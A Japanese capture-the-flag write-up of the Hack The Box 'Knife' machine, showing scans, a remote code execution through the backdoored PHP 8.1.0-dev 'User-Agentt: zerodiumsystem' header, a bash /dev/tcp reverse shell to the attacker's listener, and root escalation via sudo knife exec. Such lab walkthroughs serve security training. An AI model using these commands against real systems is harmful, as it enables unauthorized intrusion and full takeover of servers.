はじめに
HTBのKnifeマシンを解いた際の備忘録記事になります。
難易度の簡単なものから解いていく試み
スキャン
nmap -sC -sV -Pn -p- --min-rate 1000 $IP -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-15 00:45 JST
Nmap scan report for 10.10.10.242
Host is up (0.51s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.58 seconds
HTTPが開いてますね
80番ポート調査
ひとまずアクセスするが特に何もなく
ディレクトリ探索
gobuster dir -u $URL -w /usr/share/dirb/wordlists/common.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.242
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.hta.txt (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.hta.html (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 5815]
/index.php (Status: 200) [Size: 5815]
/server-status (Status: 403) [Size: 277]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
特にこれといった情報もなさそう...
念のため、apacheとsshのバージョンも確認するが特に脆弱性情報は見当たらない
色々調べていてヘッダを覗く手順にたどり着く
curl -I $URL
HTTP/1.1 200 OK
Date: Mon, 14 Jul 2025 16:39:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
PHP 8.1.0-dev
どうやらバックドアの仕組まれたバージョンであることが発覚。
User-Agenttヘッダに、zerodiumsystem()関数を渡すことでRCEが実行できるらしい。
実際に試してみる
curl $URL/index.php/test -H "User-Agentt: zerodiumsystem('ls -la');"
uid=1000(james) gid=1000(james) groups=1000(james)
<!DOCTYPE html>
<html lang="en" >
(省略)
うまくいってるのでリバースシェルを設置する
curl $URL/index.php/test -H "User-Agentt: zerodiumsystem('bash -c \"bash -i >& /dev/tcp/$LHOST/1234 0>&1\"');"
一方そのころ...
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.242] 48726
bash: cannot set terminal process group (990): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:~$ ls -l
ls -l
total 4
-r-------- 1 james james 33 Jul 13 16:33 user.txt
userフラグが獲得できました。
rootフラグまで
いったん調査
james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
マシン名の伏線が回収されました!
パスワードなしでknifeが使えるので、
james@knife:~$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
whoami
root
cd /root
ls
delete.sh
root.txt
snap
これでrootフラグも獲得できました!
攻略完了!
いえーい!